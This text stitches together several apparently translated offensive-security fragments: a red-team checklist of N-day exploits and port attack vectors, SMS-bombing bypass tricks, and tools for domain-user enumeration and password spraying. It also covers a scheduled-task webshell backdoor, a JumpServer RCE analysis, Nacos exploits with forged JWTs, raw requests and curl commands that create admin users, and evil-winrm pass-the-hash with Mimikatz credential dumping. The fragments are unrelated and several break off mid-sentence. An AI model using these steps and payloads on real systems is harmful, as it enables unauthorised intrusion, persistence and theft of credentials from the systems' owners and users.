usually the first choice for red team personnel] AppServ Xampp pagoda PhpStudy . Known Nday vulnerability exploits for various open source programs Dedecms background weak password, series known Nday vulnerability exploit thinkphp 5.x background weak password, series known Nday vulnerability exploit phpcms background weak password, series known Nday vulnerability exploit ecshop background weak password, series known Nday vulnerability exploit Metinfo background weak password, series known nday vulnerability exploit Discuz background weak password, series known Nday vulnerability exploit Empire cms background weak password, series known Nday vulnerability exploit phpmyadmin database weak password, series known Nday vulnerability exploit Wordpress background weak password, series known Nday vulnerability exploit Joomla background weak password, series known Nday vulnerability exploit drupal CVE-2018-7600, weak backend password, series known Nday vulnerability exploit . Known Nday exploits for various other web components IIS 6.0 RCE short file vulnerability PUT write arbitrarily Webdav RCE CVE-2017-7269 Zendao Project Management System SQL Injection File reading Remote execution Tongda OASQL Injection Upload any Exchange uses interface to enumerate mailbox usernames Weak password blasting for each interface CVE-2020-0688 [The prerequisite for utilization is that you must have any email user permission first] . Zimbra [ XXE + SSRF=RCE ]CVE-2013-7091 CVE-2016-9924 CVE-2019-9670 CitrixCVE-2019-19781 Jumpserver authentication bypass ZabbixCVE-2017-2824 SQL Injection [2.0 Old Version] Weak password on the console, sensitive machine information leaks Cacti version SQL injection Weak console password NagiosCVE-2016-9565 Weak console password Webmin RCECVE-2019-15107 PHPMailerCVE-2016-10033 Fanwei OA remote code execution Kingdee OA SQL injection Coremail sensitive file leak UEditor upload any file OpenSSL heart drop blood grab plain text account password [Heartbleed] shell break vulnerability [Shellshock] A variety of regular basic web vulnerabilities that can quickly getshell [Note: Some vulnerabilities are actually difficult to effectively and blindly detect without reviewing the code] weak password in the background SSRF sql injection Overreach of authority Command/Code Execution/Deserialization Upload/download/read any file Include XSS (In fact, XSS is only valuable when it is targeted at certain specific emails and has a browser 0day in hand. In fact, it is not very fatal in the red team scenario) Business logic vulnerability For various uses of various boundary network devices, mainly web management console login weak passwords and various known Nday attacks. Pulse Secure VPNCVE-2019-11510 [Arbitrary file reading] Fortinet VPNCVE-2018-13379 [File Reading] Sangfor Vpn RCE 0x03 Access to entry permissions [Specially for various getshell utilization of various basic service ports, defense focus ("top priority")] Here we only select some services that can really help getshell in practice, and some other relatively marginal services are not mentioned. Similarly, the detailed sorting of the criteria was based on the 'difficulty of actual attack utilization' and 'the shell permissions obtained' As follows, a brief description is given on the specific attack methods for each port. Top Port ListMssql [Default work on tcp 1433 port, weak password, sensitive account password leakage, privilege raising, remote execution, backdoor implantation] SMB [Default work on tcp port 445, weak password, remote execution, backdoor implantation] WMI [Default work on tcp port 135, weak password, remote execution, backdoor implantation] WinRM [The default work on tcp 5985 port, this item is mainly for some higher versions of Windows, weak passwords, remote execution, and backdoor implantation] RDP [By default, it works on tcp 3389 port, weak password, remote execution, shift class backdoor left by others] SSH [Default work on tcp 22 port, weak password, remote execution, backdoor implantation] ORACLE [Default work on tcp 1521 port, weak password, sensitive account password leakage, privilege raising, remote execution, backdoor implantation] Mysql [By default, it works on tcp 3306 port, weak password, sensitive account password leakage, and raising rights (only applicable to some old systems)] REDIS [Default work on tcp port 6379, weak password, unauthorized access, write files (webshell, start items, scheduled tasks), raising permissions] POSTGRESQL[Default work on tcp 5432 port, weak password, sensitive information leakage] LDAP [Default work on tcp port 389, unauthorized access, weak password, sensitive account password leakage] SMTP [By default, username enumeration vulnerability, weak password, sensitive information leakage caused by service misconfiguration] POP3 [Default work on tcp port 110, weak password, sensitive information leakage] IMAP [Default work on tcp port 143, weak password, sensitive information leakage] Exchange [Default work on tcp 443 port, weak password blasting eg: Owa,ews,oab,AutoDiscover. pth off-mail, sensitive information leak.] VNC [Default work on tcp port 5900, weak password] FTP [By default, it works on tcp 21 port, weak password, anonymous access/writable, sensitive information leakage] Rsync [Default work on tcp 873 port, unauthorized, weak password, sensitive information leakage] Mongodb [Default work on tcp 27017 port, unauthorized, weak password] TELNET [Default work on tcp 23 port, weak password, backdoor implantation] SVN [Default work on tcp 3690 port, weak password, sensitive information leakage

When testing Party A's business or digging for SRC and other services, we often encounter places where SMS verification is sent. What we can think of is logical vulnerabilities such as login by any user, SMS bombing, and any user modifying passwords. Simple vulnerabilities also require clear thinking analysis, use a few SMS to bomb multiple bypass cases to share, and use high-risk and low-risk to collect them. 1. Parameter pollution bypass parameter pollution, that is, when sending text messages in the background, the part of the number will be taken. When you mix other characters, you bypass the verification of the limit of the mobile phone number that has been sent2. Variable pollution bypasses the so-called variable pollution. Perhaps because the background checks the content of the first variable and is treated as a value, but when the data packet is passed to the background, if the parameter names are the same, it will be passed on with the second, third, fourth, and last parameters as the benchmark, so the limitation of the backend is bypassed 3. The definition of data length bypassing mobile phone number is 11 digits, but the background does not check the length of the transmitted mobile phone number, such as 123=0123=00123. This method is used to bypass a mobile phone number: [A vulnerability of the dog] [The picture cannot be found] 4. Bypassing the variable parameter is common. When sending the verification code, the front end brings a state. By modifying this state, the system restrictions can be bypassed. For example, registered users cannot send text messages or, on the contrary, unregistered users cannot send text messages. Flase is changed to true 5. Cookie Replace bypassing soup and not changing the medicine. Verify the user's credentials in the cookie. By modifying some parameters in the cookie, you can bypass the bypass to send/registered mobile phone number to send text messages 6. [Space bypass SMS bombing] [No picture] When sending SMS, it is 11 digits, but the database does not limit the field length to 11. The original verification is bypassed by adding spaces. However, when sending numbers in the background, the fields in front of the valid characters are taken, resulting in a bypassed method. 7. [Verification code can be reused, resulting in SMS bombing vulnerability] [No picture] After taking the username explosion or password explosion vulnerability, verification of the verification code is added, but the verification code is not released when it is sent, and the verification code will not be invalid, causing the SMS bombing vulnerability. 8. [Based on API interface] [No picture] For this vulnerability, generally, input the mobile phone number in the front desk and send a request 1 Go to the background to determine whether the send request can be executed. 2. If not, return False or error. If successful, return true or successful. Just find the returned one. This kind of vulnerability may be found on an interface.

0x01. NetLocalGroupGetMembers Function: Query members of the target server local management group 0x02. NetLocalGroupEnum Function: Return all local groups on the specified server 0x03. NetGroupGetUsers Function: Return all members of the specified server and the specified group Query members of each group in the domain, and the IP must be a domain control IP 0x04. NetUserEnum Function: Query all users of the target server, including hidden users 0x05. wnetaddconnection2a Function: Establish an IPC connection, which can map the target shared directory to the local disk 0x06. WNetCancelConnection2 Function: Delete IPC connection 0x07. EnuDomainUser Function: Enumerate domain users 1. Introduction Applicable to: The current boundary machine permissions are working group machines. Through tools such as nltest or nbtscan, it is discovered that the intranet has a domain environment and the domain control IP is found, but the penetration idea is not in the domain user's permissions. Prerequisite: Ability to establish an empty connection with the domain control Implementation principle: The domain manager will have administrator users by default. The SID of the administrator domain manager is found through the Windows API, and then iterates over the SID range and enumerates domain members (domain users and domain machines). SID range: The SIDs of domain users and domain machines are generally above 1000, so when using tools, traversing SIDs above 1000 2. Tool usage Help: C:\Users\Administrator\DesktopEnuDomainUser.exe Usage: EnuDomainUser.exe DC-IP domainname\username start Sid end Sid t_num EnuDomainUser.exe \\192.168.52.2 hack\administrator 1000 2000 100 EnuDomainUser.exe \\Domain Control IP Domain Name\Domain User Name Default Administrator Start Sid End Sid Number of Multithreads Use demo: EnuDomainUser.exe 192.168.52.2 hack\administrator 1000 2000 100 Parameter explanation: 192.168.52.2 is a domain control IP hack is a domain name administrator is the default user of domain management 1000 is the beginning of the traversal SID 2000 is the end of the traversal SID - you can set a little higher, such as 10000, 20000, etc. 100 is the number of multithreads 0x08. BlastDomainUserPwd Function: Blasting Domain User Password 1. Introduction Connect via IPC - Password of the blasting domain user Combining the EnuDomainUser tool or kerbrute tool to obtain the domain user name list and then burst If you are killed by 360, just change the exe name Design ideas: If you can establish an empty connection with the domain control, use the EnuDomainUser tool to enumerate and traverse all domain user names If you cannot establish an empty connection with the domain control, use the kerbrute tool to blast the domain user name After obtaining a batch of domain user names, start trying to break the weak password of the domain user password If the domain user password has strength requirements, try to blast the strong password. For example: P@ssw0rd, 1qaz@WSX, etc. 2. Use of tools Usage: BlastDomainUserPwd.exe domainComputerIp domainUser.txt password t_num BlastDomainUserPwd.exe \\192.168.52.29 domainUser.txt password 100 BlastDomainUserPwd.exe \\Domain Machine IP Domain User Name Dictionary Password Trying to Blast Number of Multithreads Domain User Name Dictionary Format Specification: Domain Name\Domain User Name domain\user Running example: BlastDomainUserPwd.exe \\192.168.52.2 domainUser.txt 1qaz@WSX 3 The domain user password successfully blasted is saved in the success.txt text of the current directory 0x09. SchtaskBackDoorWebshell Function: Schedule task maintenance webshell 1. Applicable scenarios: The defender discovered the webshell in the protection network and cleared it out. The vulnerability was also fixed. Then, when the website was restored, the webshell could no longer be uploaded, the webshell was rewrited through the scheduled task. 2. Conditions: Administrator permissions, because creating scheduled tasks requires administrator permissions 3. How to use: xxxx.exe c:\www\upload\1.jsp 4. Implementation process: Copy the content of c:\www\upload\1.jsp to c:\windows\temp\tempsh.txt, and then create a planned task. The command executed is c:\windows\system32\cmd.exe /c copy c:\windows\temp\tempsh.txt c:\www\upload\1.jsp, triggered every half hour. 5. Video display: 0x10. regeditBypassUAC Function: Execute exe via uac. The compiled exe is only suitable for win10, but not win7. 1. Specific process Whitelist program registry bypassUAC 2. Video demonstration 0x11. delegationVul Function: Detecting the constraint delegation of the internal domain 1. Constrained delegation utilization Constrained delegation utilization 2. Video demonstration 3. Resource-based constrained delegation utilization Resource-based constrained delegation utilization 4. Video demonstration 0x12. 360SafeBrowserDecrypt Function: Run directly on the target machine, but it cannot help but kill 360SafeBrowserDecrypt.exe Drag the target machine id and assis2.db database back to local decryption Check machine id: reg query 'HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY' /v 'MachineGuid' Check 360 Safe Browser Installation Directory : reg query 'HKCR\360SeSES\DefaultIcon' The default assis2.db database directory : C:\Users\

0 Introduction JumpServer is an open source bastion machine, an operation and maintenance security audit system that complies with the 4A specifications. In layman's terms, it is a springboard machine. On January 15, 2021, JumpServer released a security update, fixing a remote command execution vulnerability. Since some JumpServer interfaces do not have authorization restrictions, an attacker can construct a malicious request to obtain sensitive information, or perform related operations to control all machines and execute arbitrary commands. Affect version: JumpServer v2.6.2JumpServer v2.5.4JumpServer v2.4.5JumpServer=v1.5.9 1. Vulnerability Analysis See the commit record of the repair code: https://github.com/jumpserver/jumpserver/commit/f04e2fa0905a7cd439d7f6118bc810894eed3f3e It was found that the connection of the CeleryLogWebsocket class was added with identity authentication. import time import os import threading import json from common.utils import get_logger from .celery.utils import get_celery_task_log_path from .ansible.utils import get_ansible_task_log_path from channels.generic.websocket import JsonWebsocketConsumer logger=get_logger(__name__) class TaskLogWebsocket(JsonWebsocketConsumer): disconnected=False log_types={ 'celery': get_celery_task_log_path, 'ansible': get_ansible_task_log_path } def connect(self): user=self.scope['user'] if user.is_authenticated and user.is_org_admin: self.accept() else: self.close() def get_log_path(self, task_id): func=self.log_types.get(self.log_type) if func: return func(task_id) def receive(self, text_data=None, bytes_data=None, **kwargs): data=json.loads(text_data) task_id=data.get('task') self.log_type=data.get('type', 'celery') if task_id: self.handle_task(task_id) def wait_util_log_path_exist(self, task_id): log_path=self.get_log_path(task_id) While not self.disconnected: if not os.path.exists(log_path): self.send_json({'message': '.', 'task': task_id}) time.sleep(0.5) Continue continue self.send_json({'message': '\r\n'}) try: logger.debug('Task log path: {}'.format(log_path)) task_log_f=open(log_path, 'rb') return task_log_f except OSError: return None def read_log_file(self, task_id): task_log_f=self.wait_util_log_path_exist(task_id) if not task_log_f: logger.debug('Task log file is None: {}'.format(task_id)) Return task_end_mark=[] While not self.disconnected: data=task_log_f.read(4096) if data: data=data.replace(b'\n', b'\r\n') self.send_json( {'message': data.decode(errors='ignore'), 'task': task_id} ) if data.find(b'succeeded in') !=-1: task_end_mark.append(1) if data.find(bytes(task_id, 'utf8')) !=-1: task_end_mark.append(1) elif len(task_end_mark)==2: logger.debug('Task log end: {}'.format(task_id)) break time.sleep(0.2) task_log_f.close() def handle_task(self, task_id): logger.info('Task id: {}'.format(task_id)) thread=threading.Thread(target=self.read_log_file, args=(task_id,)) thread.start() def disconnect(self, close_code): self.disconnected=True self.close() Check out the http interface of this class: Through this class, we can know that the access chain of this interface is: Visit ws/ops/tasks/log/ -- Enter the receive function of TaskLogWebsocket class -- Enter the handle_task function of TaskLogWebsocket class -- Enter the read_log_file function of the TaskLogWebsocket class -- Enter the wait_util_log_path_exist function of the TaskLogWebsocket class -- Enter the read_log_file function of the TaskLogWebsocket class -- Enter the get_task_log_path function in app/ops/utls.py taskid is parsed from the text_data we sent, so it is controllable. Through the following method, we can read the log file /opt/jumpserver/logs/jumpserver.log. Send to ws://10.10.10.10:8080/ws/ops/tasks/log/ {'task':'/opt/jumpserver/logs/jumpserver'}The above is the principle of file reading. There are the following restrictions on reading log files: Files can only be read using absolute paths. Only files ending in log are read. The following analysis is how to implement remote code execution. By reading /opt/jumpserver/logs/gunicorn.log, if you are lucky, you can read the user uid, system user uid, and asset id: user idasset idsystem user id The above three information needs to be found that the user is logging in to the web terminal to get it from the log. After getting it. Through the /api/v1/authentication/connection-token/interface, you can enter the /apps/authentication/api/UserConnectionTokenApi The token with only 20s validity period can be obtained through user_id asset_id system_user_id. This token can be used to create a koko component's tty: https://github.com/jumpserver/koko/blob/master/pkg/httpd/webserver.go#342 -- https://github.com/jumpserver/koko/blob/4258b6a08d1d3563437ea2257ece05b22b093e15/pkg/httpd/webserver.go#L167 The specific code is as follows: The complete RCE utilization steps are summarized as: The websocket connection can be established without authorization. The log file can be read through the websocket to get the system user, user, and asset fields in the log file. Through the fields in 3, you can get a token of 20 seconds through the token and enter the koko tty. Execute the command 2 Vulnerability recurrence 2.1 Environment construction Local environment: xubuntu20.04jumpserver version: 2.6.1 version installation steps: # download git clone https://github.com/jumpserver/installer.git cd installer # Domestic docker source acceleration export DOCKER_IMAGE_PREFIX=docker.mirrors.ustc.edu.cn # Install the dev version and then switch to 2.6.1 (You should be able to install 2.6.1 directly. At the beginning, it was installed as the default dev version, but it doesn't matter) sudo su ./jmsctl.sh install ./jmsctl.sh upgrade v2.6.1 # start up ./jmsctl.sh restart full log # yanq @ yanq-desk in ~/gitrepo [22:18:53] C:127 $ git clone https://github.com/jumpserver/installer.git Cloning to 'installer'. remote: Enumerating objects: 467, done. remote: Total 467 (delta 0), reused 0 (delta 0), pack-reused 467 : 100% (467/467), 95.24 KiB | 182.00 KiB/s, completed. Process : 100% (305/305), done. # yanq @ yanq-desk in ~/gitrepo [22:20:27] $ cd installer # yanq @ yanq-desk in ~/gitrepo/installer on git:master o [22:20:30] $ ls compose config-example.txt config_init jmsctl.sh README.md scripts static.env utils # yanq @ yanq-desk in ~/gitrepo [22:18:59] $ export DOCKER_IMAGE_PREFIX=docker.mirrors.ustc.edu.cn # yanq @ yanq in ~/github/installer on git:master o [22:03:43] C:130 $ sudo su root@yanq:/home/yanq/github/installer# ./jmsctl.sh install ██╗██╗ ██╗███╗ ███╗██████╗ ███████╗███████╗██████╗ ██╗ ██╗███████╗██████╗ ██║██║ ███████████████████╔═════════════════════██║ ██╔════════██╗ ██║██║ ██║██╔████╔██║██████╔╝███████╗█████╗ ██████╔╝██║ ██║█████╗ ██████╔╝ █████████████║╚██║╚██╔╝██═══╝ ╚════██╔══╝ ██╔═══╝ ██╔═══╝ ██╔══╝ ██╔═══█╗ ╚█████╔╝╚██████╔╝██║ ╚═╝ ██║██║ ███████║███████╗██║ ██║ ╚████╔╝ ███████╗██║ ██║ ╚════╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝ ╚══╝ ╚═══╝ ╚══╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ Version: dev 1. Configure JumpServer 1. Check the configuration file Each component uses environment variable configuration files instead of yaml format, and the configuration name is consistent with the previous one Configuration file location : /opt/jumpserver/config/config.txt Finish 2. Configure Nginx certificates The certificate location is : /opt/jumpserver/config/nginx/cert Finish 3. Backup configuration files Backup to /opt/jumpserver/config/backup/config.txt.2021-01-17_22-03-52 Finish 4. Configure the network Need to support IPv6? (y/n) (default is n): n Finish 5. Automatically generate encryption keys Finish 6. Configure the persistence directory Modify persistent directories such as log recording, find the largest disk, and create directories, such as /opt/jumpserver Note that : cannot be changed after installation, otherwise the database may be lost. File System Capacity Used Available Used % Mount Point udev 7.3G 0 7.3G 0% /dev /dev/nvme0n1p2 468G 200G 245G 45% / /dev/loop1 56M 56M 0 100% /snap/core18/1944 /dev/loop2 65M 65M 0 100% /snap/gtk-common-themes/1513 /dev/loop3 218M 218M 0 100% /snap/gnome-3-34-1804/60 /dev/loop0 56M 56M 0 100% /snap/core18/1932 /dev/loop5 32M 32M 0 100% /snap/snapd/10492 /dev/loop6 65M 65M 0 100% /snap/gtk-common-themes/1514 /dev/loop4 52M 52M 0 100% /snap/snap-store/498 /dev/loop7 52M 52M 0 100% /snap/snap-store/518 /dev/loop8 219M 219M 0 100% /snap/gnome-3-34-1804/66 /dev/loop9 32M 32M 0 100% /snap/snapd/10707 /dev/nvme0n1p1 511M 7.8M 504M 2% /boot/efi Set the persistent volume storage directory (default is /opt/jumpserver) : Finish 7. Configure MySQL Whether to use external mysql (y/n) (default is n): n Finish 8. Configure Redis Whether to use external redis (y/n) (default is n): n Finish 2. Install and configure Docker 1. Install Docker Start downloading the Docker program. --2021-01-17 22:04:12-- https://mirrors.aliyun.com/docker-ce/linux/static/stable/x86_64/docker-18.06.2-ce.tgz Resolving host mirrors.aliyun.com (mirrors.aliyun.com). 180.97.148.110, 101.89.125.248, 58.216.16.38, Connecting mirrors.aliyun.com (mirrors.aliyun.com)|180.97.148.110|:443. Connected. HTTP request has been issued, waiting for a response. 200 OK Length: 43834194 (42M) [application/x-tar] Saving to : "/tmp/docker.tar.gz" /tmp/docker.tar.gz 100%[============================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================== 2021-01-17 22:04:16 (13.8 MB/s) - Saved "/tmp/docker.tar.gz" [43834194/43834194]) Start downloading the Docker compose program. --2021-01-17 22:04:17-- https://get.daocloud.io/docker/compose/releases/download/1.27.4/docker-compose-Linux-x86_64 Resolving the host get.daocloud.io (get.daocloud.io). 106.75.86.15 Connecting get.daocloud.io (get.daocloud.io)|106.75.86.15|:443. Connected. HTTP request has been issued, waiting for a response. 302 FOUND Location: https://dn-dao-github-mirror.daocloud.io/docker/compose/releases/download/1.27.4/docker-compose-Linux-x86_64 [Follow to new URL] --2021-01-17 22:04:28-- https://dn-dao-github-mirror.daocloud.io/docker/compose/releases/download/1.27.4/docker-compose-Linux-x86_64 Resolving host dn-dao-github-mirror.daocloud.io (dn-dao-github-mirror.daocloud.io). 240e:ff:a024:200:33603fe, 240e:964:100:302:33603fe, 61.160.204.242, Connecting dn-dao-github-mirror.daocloud.io (dn-dao-github-mirror.daocloud.io)|240e:ff:a024:200:3fe|:443. Connected. HTTP request has been issued, waiting for a response. 200 OK Length: 12218968 (12M) [application/x-executable] Saving to : "/tmp/docker-compose" /tmp/docker-compose

Nacos vulnerability summary recurrence 1. Nacos default key causes permission to bypass login A problem affecting Nacos=2.1.0 was found in Nacos, and Nacos users using the default JWT key caused an unauthorized access vulnerability. Through this vulnerability, the attacker can bypass username and password authentication and log in to the Nacos user directly. 0x00 Vulnerability Description 0.1.0=Nacos=2.2.0 0x01 Vulnerability Impact fofa: app='NACOS' 0x02 Vulnerability Search In nacos, the token.secret.key value is fixed and dead, and the location is in application.properties under conf: nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789 1. Get the token and use this default key to perform jwt construction and directly enter the background. The construction method: In https://jwt.io/: Enter the default key: SecretKey012345678901234567890123456789012345678901234567890123456789 Then enter in payload: { 'sub': 'nacos', 'exp': 1678899909 } Note here: The value of 1678899909 is a unix timestamp. If you want to convert it, it will be later than the current time in your system. For example, the current time is March 15, 2023 22:11:09, and the time stamp time here is March 16: Notice: The following are the test results of forging JWT values to bypass permissions 1. Extend timestamp, POST password is wrong, and username is correct 2. Extend timestamp, POST password, user name error 3. Delete the timestamp, the POST password is wrong, the user name is wrong Copy the value obtained above, select login in burp and construct: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s You need to add it yourself in the box: POST /nacos/v1/auth/users/login HTTP/1.1 Host: 10.211.55.5:8848 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: http://10.211.55.5:8848 Connection: close Referer: http://10.211.55.5:8848/nacos/index.html Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s username=crowsecpassword=crowsec At this time, I got the token information: HTTP/1.1 200 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Content-Security-Policy: script-src 'self' Set-Cookie: JSESSIONID=D90CF6E5B233685E4A39C1B1BDA9F185; Path=/nacos; HttpOnly Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s Content-Type: application/json Date: Wed, 15 Mar 2023 14:13:22 GMT Connection: close Content-Length: 197 {'accessToken':'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s','tokenTtl':18000,'globalAdmin':true,'username':'nacos'} At this time, I got the token information of Nacos. 2. How to log in to the background by using token to log in? Here you need to log in with a fake account and then modify it and return to the package. Try it: Log in with a fake account first, and use burp to intercept This is definitely not accessible. Change the return package here and right-click to read this: Then Forward, the information returned here is definitely invalid: Here we use the return package generated in burp just now to replace it, and copy it all: Forward again Now that I've already entered: 3. Use the default key to generate JWT to view the current username and password GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7spageNo=1pageSize=9 HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0Accept-Encoding: gzip, deflateConnection: closeIf-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMTUpgrade-Insecure-Requests: 1accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s4.Use the default key, add hellonacos user password to hellonacos, and create it successfully POST /nacos/v1/auth/users HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0Authorization: BearereyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7sAccept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMTContent-Type: application/x-www-form-urlencodedContent-Length: 39 username=hellonacospassword=hellonacos 0x03 Vulnerability Recurrence http://10.10.84.207:8848/nacos/v1/auth/users?pageNo=1pageSize=9search=accurateaccessTokenhttp://your_ip:8848/nacos/v1/auth/users/?pageNo=1pageSize=9 2. Nacos default configuration unauthorized access vulnerability Add serverIdentity 3. Nacos2.2.0 permission bypass Adding serverIdentity If there is no or does not correspond, return 403 IV. Nacos1.x.x version User-Agent permission bypass ((CVE-2021-29441) 0x01 Vulnerability Description In Nacos 1.4.1 and earlier, AuthFilter servlet filters are used to enforce authentication, thus skipping authentication checks. This mechanism relies on user-agent HTTP headers and is therefore easily spoofed. This issue may allow any user to perform any administrative tasks on the Nacos server. 0x02 Environment construction docker run -d -p 8848:8848 hglight/cve-2021-29441 0x03 Vulnerability Impact Nacos=1.4.1 0x04 Vulnerability recurrence 1. Modify the value of User-Agent to Nacos-Server to the request package, and after adding the Header header, visit http://target:8848/nacos/v1/auth/users?pageNo=1pageSize=9 You can see that the return value is 200, and whether the content contains pageItemsGET /nacos/v1/auth/users/?pageNo=1pageSize=9 HTTP/1.1 Host: 192.168.246.138:8848 User-Agent: Nacos-Server Or use the command to access: read the user password: curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1pageSize=9accessToken=' -H 'User-Agent: Nacos-Server'curl'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1pageSize=9search=blur'-H'User-Agent:Nacos-Server' curl'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1pageSize=9search=accurate'-H'User-Agent:Nacos-Server'Unauthorized addition of user curl-XPOST'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1password=test1' -H 'User-Agent:Nacos-Server any user password change curl-X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent:Nacos-Server' -d 'username=test1newPassword=test2'Read configuration file curl-XGET'http://127.0.0.1:8848/nacos/v1/cs/configs?search=accuratedataId=group=pageNo=1pageSize=99'curl-XGET'http://127.0.0.1:8848/nacos/v1/cs/configs?search=blurdataId=group=pageNo=1pageSize=99' After adding the Header header, use the POST method to request http://target:8848/nacos/v1/auth/users?username=vulhubpassword=vulhubAdd a new user, and the account password is vulhubPOST /nacos/v1/auth/users?username=hglightpassword=hglight HTTP/1.1 Host: 192.168.246.138:8848 User-Agent: Nacos-Server or POST /nacos/v1/auth/users HTTP/1.1Host: 192.168.31.64:8848Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Nacos-ServerAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 27username=hglightpassword=hglight View the user list again. In the returned user list data, there is an additional new user we created by bypass authentication. GET /nacos/v1/auth/users/?pageNo=1pageSize=9 HTTP/1.1 Host: 192.168.246.138:8848 User-Agent: Nacos-Server Access http://IP:8848/nacos Log in with a new user, which means that the vulnerability is exploited successfully

Foreword Evil-winrm The tool was originally developed by the Hackplayers team. The purpose of developing this tool is to simplify penetration testing as much as possible, especially in Microsoft Windows environments. Evil-winrm uses PowerShell Remote Protocol (PSRP), and Windows Remote is often used by system and network administrators Management protocol is uploaded and managed. WinRM is a firewall-friendly SOAP protocol that can be used via HTTP default port 5985 Used with HTTP transport. For more information about PowerShell remote processing, please refer to visit the official Microsoft website. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3 Introduction to Evil-winrm Evil-winrm is an open source tool developed using the ruby language. The tool has many cool features, including remote login with a plain text password, SSL Encrypted login, NTLM hash login, key login, file transfer, log storage and other functions. The author of this development tool is constantly updating the tool and maintaining updates for a long time. use evil-winrm, we can get the PowerShell command terminal session of the remote host. The tool is integrated in Kali Linux systems, but if you want to download it separately, you can download it from its official git repository. Download link: https: //github.com/Hackplayers/evil-winrm Winrm Service Discovery As mentioned above, if enabled in the remote host Winrm service will be associated with the use of evil-winrm tool. In order to confirm whether the target system has enabled winrm service, we can use nmap to find two default winrm service ports 5895 and 5896 Whether it is turned on. From the nmap scan results, we found that the winrm service is enabled, so we can use the evil-winrm tool to log in and perform other tasks we will explore in the horizontal phase. nmap -p 5985 , 5986 192.168 .1 .19 : Evil-winrm help command help To list all available features of evil-winrm, we can simply use the -h flag, which will list all the help commands with descriptions. evil-winrm -h Login with a plain text password Suppose we obtained a plaintext password during the account enumeration phase and noticed that the remote host has enabled winrm service, we can use evil-winrm to perform remote sessions on the target system, using the target system IP address with the -i parameter, the target system username with the -u parameter, and the target system password with the -p parameter. As shown in the figure below, we can see that a remote PowerShell session has been established. evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 Login with a plain text password - Enable SSL As mentioned above, the winrm service can transport traffic over the HTTP protocol, and we can then use the Secure Sockets Layer (SSL) feature to ensure the connection is secure. Once SSL is enabled, our data will be transferred through an encrypted secure socket layer. Using evil-winrm, we can use the -S parameter to establish a command for secure transmission with the remote host. evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S Login with NTLM Hash - Attack by hash Penetration or resolution of any intranet In projects related to Windows permission escalation and Active Directory utilization, we often obtain NTLM hash values through various attack methods. If we are in a Windows intranet environment, we can use evil-winrm to create PowerShell by performing a pass-through hash attack session, so that you can use the hash as a password instead of using a plain text password for remote login. In addition, this attack supports other protocols. Passing a hash we can use the -H parameter. evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 Load Powershell script Evil-winrm also provides a feature that allows us to use powershell scripts that come with the target host. The script can be loaded directly into memory, and we can use the relative path of the powershell script connected to the target system with the -s parameter. In addition, the tool provides the AMSI features we often need before importing any scripts. In the following example, we will bypass the AMSI function and call it directly from the system The Invoke-Mimiktz.ps1 script is placed into the target host and loaded into memory. After that, you can use the mimikatz command. For demonstration purposes, we dumped the system login credentials directly from the cache. After dumping the credentials, we can again use the obtained NTLM hash for a hash pass attack. https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell Bypass-4MSI Invoke-Mimikatz.ps1 Invoke-Mimikatz Storing logs using 